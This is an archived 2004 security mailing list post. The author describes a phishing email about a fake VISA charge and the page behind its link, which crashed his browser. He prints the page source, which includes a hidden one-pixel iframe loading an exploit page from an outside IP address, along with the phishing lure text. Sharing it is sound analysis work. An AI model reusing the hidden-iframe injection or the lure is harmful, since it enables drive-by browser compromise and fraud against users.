Dailydave mailing list archives

Previous By Date Next
Previous By Thread Next

Interesting hack attempt!

From: Dave Aitel <dave () immunitysec com>
Date: Thu, 13 May 2004 12:00:40 -0400
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Someone sent me a message:

Thank you for shopping with BuyHYQ. Please keep this email invoice for
your
records.

On May, 12 2004 we shipped your order number 91782656 for the
following item:

INV. NO.  H139-22192

1 S452-2700    Syntax Olevia 27" WXGA LCD TV      $1,399.99

To track the shipping status of your BuyHYQ order, visit our Order Status
page at:
http://www.bhyq.net/billing/orderstatus.php?91782656 $1,399.99 Has Been Charged To Your VISA Account. 

I was bored, so I clicked on the obvious hack attempt (I don't even
own a VISA) and Mozilla promptly took up all the memory on my system.
...
brk(0)                                  = 0x1b920000
brk(0x1b92d000)                         = 0x1b92d000
brk(0)                                  = 0x1b92d000
brk(0x1b93d000)                         = 0x1b93d000
brk(0)                                  = 0x1b93d000
brk(0x1b94a000)                         = 0x1b94a000
brk(0)                                  = 0x1b94a000
brk(0x1b94d000)                         = 0x1b94d000
brk(0)                                  = 0x1b94d000
...

[dave@localhost CANVAS]$ lynx --source
http://www.bhyq.net/billing/orderstatus.php?91782651
<html>
<head>
<title>BuyHYQ Order Status Page</title>
<META HTTP-EQUIV="Content-Language" CONTENT="EN">
<meta http-equiv="Refresh" content="2;
URL=http://www.bhyq.net/billing/status.html";>
<META NAME="revisit-after" CONTENT="7 days">
<META NAME="robots" CONTENT="FOLLOW,INDEX">
</head>
<BODY BGCOLOR=white color=black LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0
MARGINHEIGHT=0>
<IFRAME SRC="http://65.75.137.180/exploit.htm"; WIDTH=1 HEIGHT=1
border=0></IFRAME>

<!-- Hacked by TNT Team -->
<center>
Loading your order info, please wait...
</center>
</body>
</html>

The exploit is missing now, but it was interesting to see! Way to go guys!

- -dave

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAo5uozOrqAtg8JS8RAl0sAJ9iH9vChnfQGX0nRBwkO4RuskfANQCbB1Ze
mKBtD3ebLp7mMSG6KV1OfZM=
=PeH5
-----END PGP SIGNATURE-----

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave
Previous By Date Next
Previous By Thread Next

Current thread: